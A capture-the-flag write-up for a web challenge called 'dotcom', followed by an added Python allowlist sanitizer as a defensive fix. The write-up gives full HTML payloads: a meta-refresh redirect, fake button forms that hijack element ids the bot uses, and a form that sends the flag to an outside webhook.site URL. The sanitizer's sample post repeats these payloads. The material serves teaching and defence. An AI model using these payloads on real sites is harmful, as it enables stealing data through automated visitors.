[/MNT/AIN LIB] [WEB] dotcom

dotcom
SRC: https://library.m0unt41n.ch/challenges/dotcom


Solved this chall locally, submitted publicly shared flag. (hope that's fine) Reported chall as broken and fixed it.

There is a .NET server and a BOT component; we need to make the bot write the flag into a textArea and somehow exfil the flag.
Due to the known bot behaviour we can abuse the broken logic of how posts are handled and viewed: post content is rendered unsanitized, so we can inject HTML and make the bot perform actions on our elements, essentially achieving "XSS".

1. The first main issue is that the bot presses the back key, essentially going back to the main dashboard. We prevent this by abusing the 1 second delay of the bot and instantly redirecting it to our malicious post: <meta http-equiv="refresh" content="0; URL=/content/10faf2c4-0879-4e53-8201-c01b4a8cd8a0">

2. Next up we need to provide the buttons the bot wants/needs to press before it actually writes the flag into id="textArea", so we craft some HTML that just allows the button presses and prevents bot exceptions:

HTML:
<form action="#" method="GET">
  <input id="back"   type="submit">
</form>

<form action="#" method="GET">
  <input id="create" type="submit" value="create">
</form>

3. Last but not least, if the bot hasn't run into an exception it will write the flag into said id textArea and press the submit button. We craft a malicious form which will send the flag to our webhook:

HTML:
<form action="https://webhook.site/x" method="GET">
  <input  id="textArea" name="flag" type="text">
  <input  id="submit"   type="submit" value="send flag">
</form>

So final flow:
1. The post just redirects to the malicious post, which is shown as content/id -> this results in no other boilerplate HTML (like the actual back button).
2. Our malicious HTML allows the bot to perform its button presses, write the flag and submit the malicious form.
3. Yeehaa, we get the flag delivered to our doorstep.
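From the defender's side, the root cause of this chain is that user-supplied post HTML is rendered as-is, so the fixed element ids the bot relies on (back, create, textArea, submit) can be redefined by an attacker. The following is an added example, not part of the original writeup or the challenge's .NET code: an allowlist sanitizer in Python (chosen for illustration, the real server is .NET) that strips the meta refresh, forms, inputs and id attributes the chain depends on before a post is stored or rendered. The tag allowlist and the sample post are assumptions made up for the example.

```python
from html.parser import HTMLParser
from html import escape

# Allowlist: only these tags and attributes survive. <meta>, <form>, <input>
# and every id= / on*= / style= attribute are dropped, so a post can no longer
# redirect the bot or provide it with elements carrying the expected ids.
ALLOWED_TAGS = {"p", "b", "i", "em", "strong", "a", "ul", "ol", "li", "br", "code", "pre"}
ALLOWED_ATTRS = {"a": {"href"}}   # href is the only attribute kept, and only on <a>
VOID_TAGS = {"br"}                # no closing tag is emitted for these


class PostSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []      # sanitized HTML fragments
        self.dropped = []  # disallowed tag names, useful for logging/alerting

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.dropped.append(tag)
            return
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue  # drops id=, style=, onclick=, http-equiv=, action=, ...
            value = value or ""
            # Only same-origin or http(s) links; rejects javascript: and data: URLs.
            if name == "href" and not value.lower().startswith(("http://", "https://", "/")):
                continue
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))  # text is always entity-encoded


def sanitize_post(raw_html: str):
    """Return (clean_html, dropped_tags) for one user-submitted post body."""
    parser = PostSanitizer()
    parser.feed(raw_html)
    parser.close()
    return "".join(parser.out), parser.dropped


# Constructed sample modelled on the chain above: redirect + exfil form + id hijack.
SAMPLE_POST = ('<meta http-equiv="refresh" content="0; URL=/content/x">'
               '<form action="https://webhook.site/x" method="GET">'
               '<input id="textArea" name="flag" type="text">'
               '<input id="submit" type="submit" value="send flag"></form>'
               '<p id="back">hello</p><a href="javascript:alert(1)" id="create">x</a>')
```

Feeding SAMPLE_POST through sanitize_post leaves only the paragraph and a bare anchor, and the dropped-tag list gives the server something to alert on when a post tries to smuggle in forms or redirects.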
